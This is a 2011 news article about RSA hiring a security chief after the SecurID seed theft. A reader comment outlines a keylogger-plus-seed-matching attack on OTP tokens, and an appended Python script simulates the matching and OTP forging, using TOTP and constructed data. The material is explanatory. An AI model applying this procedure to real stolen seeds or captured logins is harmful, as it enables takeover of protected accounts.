
RSA hires a security chief as firms get busy replacing SecurID tokens

A bumpy ride ahead
Fri Jun 10 2011, 13:23

CRYPTOGRAPHY FIRM RSA Security has appointed its first chief security officer as the company continues the time-consuming task of replacing SecurID tokens that could have been affected by an attack on its systems in March.

According to his Twitter account, Eddie Schwartz has moved from the chief security officer position at security firm NetWitness to the same role at RSA. NetWitness, which makes network monitoring technology, was recently acquired by RSA's parent company EMC.

He has also held the chief security officer role at Nationwide Insurance and was previously a foreign service officer with the US State Department. He will immediately face some difficult tasks, such as restoring RSA's reputation after the theft of SecurID data, which the firm has admitted was used in an attack on US military contractor Lockheed Martin and potentially others.

RSA's problems concern its SecurID devices, electronic keys or tokens used by many firms and organisations around the world that generate one-time passcodes for access to confidential networks, computer systems and databases.

RSA has not been totally clear about the details of the attack on its systems, but it is thought that the attackers might have obtained the token seed records, the per-token secrets from which the SecurID algorithm generates each passcode.

The company has said that it will replace the SecurID tokens of some customers, and Reuters has reported that two Australian banks are already going through that process.


Comments
This is NOT an RSA problem!

If we assume that the hackers that attacked Lockheed-Martin have access to the RSA algorithm, knowledge of what tokens are assigned to what companies, and a list of the seeds in those tokens, it becomes a bounded brute force exercise to figure out which token a specific employee is using.

Let me break this down into the steps used to hack into a network using this information. While it seems like I am giving away trade secrets, the hackers have already used this knowledge.

1. Drop malware onto a targeted PC owned by XYZ company that will install a keylogger.
2. Capture the user name, password, and RSA token response when the user logs in to the XYZ corporate network from the targeted PC.
3. One at a time, input the time that the OTP was captured by the keystroke logger along with one of the stolen seeds that belong to the RSA tokens owned by XYZ company into the SecurID algorithm. One of the seeds will generate an OTP that matches the captured value.
4. Using the information from step 3, you can determine which token is in use by the targeted employee. You now have his user name and static password and can use the seed and the current time to generate as many OTPs as you like.

While it’s easy to take shots at RSA, this is not just an RSA problem. It is a problem with all OTP tokens. Because the token and an authentication server have to generate and match the same OTP, they must have a shared secret. And as we have seen, once the algorithm and shared secret get out, the protection is broken.

Maybe this is FINALLY the year of Public Key Infrastructure (PKI) for authentication!

posted by: Ronlap, 11 June 2011
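The seed-matching procedure the comment above describes, as an added example that is not code from the article, the commenter, or RSA. RFC 6238 TOTP (HMAC-SHA1, 30-second step, six digits) is used as a stand-in for the SecurID algorithm, which is not reproduced here; the token serials, seeds, username, password, capture timestamp and the "XYZ company" are all constructed for the illustration.

```python
"""Seed-matching attack on a shared-secret OTP token (simulation).

Added example, not code from the article or the commenter. RFC 6238 TOTP
(HMAC-SHA1, 30-second step, 6 digits) stands in for the SecurID algorithm,
which is not reproduced here. All seeds, serials, the username, password
and timestamp below are constructed for the example.
"""
import hashlib
import hmac
import struct

STEP_SECONDS = 30
DIGITS = 6


def totp(seed: bytes, unix_time: int) -> str:
    """OTP for a shared secret at a given time (RFC 6238 over RFC 4226 HOTP)."""
    counter = unix_time // STEP_SECONDS
    digest = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** DIGITS:0{DIGITS}d}"


# Constructed stand-in for the stolen seed records of the hypothetical
# XYZ company: token serial -> 20-byte seed.
STOLEN_SEEDS = {
    "000123456789": bytes.fromhex("0b7a1c9d3e5f60718293a4b5c6d7e8f90a1b2c3d"),
    "000123456790": bytes.fromhex("1f2e3d4c5b6a79887766554433221100ffeeddcc"),
    "000123456791": bytes.fromhex("deadbeefcafebabe0123456789abcdef01234567"),
    "000123456792": bytes.fromhex("00112233445566778899aabbccddeeff00112233"),
}


def simulate_keylogger_capture(victim_serial: str, login_time: int) -> dict:
    """Steps 1 and 2: what a keylogger on the victim's PC records at login.

    The token output is simulated from the victim's own seed; the attacker
    only ever sees the six digits the user typed and when they typed them.
    """
    return {
        "user": "jdoe",                       # constructed
        "password": "Winter2011!",            # constructed
        "otp": totp(STOLEN_SEEDS[victim_serial], login_time),
        "time": login_time,
    }


def match_seed(stolen_seeds: dict, captured_otp: str, captured_time: int,
               skew_steps: int = 1) -> list:
    """Step 3: try every stolen seed at the capture time and return the
    serials whose token would have displayed the captured OTP.

    +/- skew_steps time steps allow for drift between the victim PC's clock
    (which timestamped the keystrokes) and the token. A list is returned
    because a 6-digit code can collide across many seeds; a second captured
    login disambiguates.
    """
    hits = []
    for serial, seed in stolen_seeds.items():
        for k in range(-skew_steps, skew_steps + 1):
            if totp(seed, captured_time + k * STEP_SECONDS) == captured_otp:
                hits.append(serial)
                break
    return hits


def forge_otp(stolen_seeds: dict, serial: str, unix_time: int) -> str:
    """Step 4: with the seed identified, mint a valid OTP for any time."""
    return totp(stolen_seeds[serial], unix_time)


if __name__ == "__main__":
    t_login = 1307700000                      # constructed: 10 June 2011, 10:00 UTC
    capture = simulate_keylogger_capture("000123456791", t_login)
    print("keylogger capture:", capture)
    hits = match_seed(STOLEN_SEEDS, capture["otp"], capture["time"])
    print("seeds matching the captured OTP:", hits)
    for serial in hits:
        later = t_login + 3600
        print(f"token {serial}, OTP one hour later: "
              f"{forge_otp(STOLEN_SEEDS, serial, later)}")
```

The search is bounded by the number of seed records the attacker holds for the target organisation, not by the OTP space, which is why a stolen seed database turns a six-digit code into a lookup. The matcher returns every candidate rather than the first hit because a short code can collide across a large seed set; one more captured login, checked with the same function, is enough to settle it. Nothing in the script touches the authentication server: everything it needs is the shared secret, which is the point the comment makes.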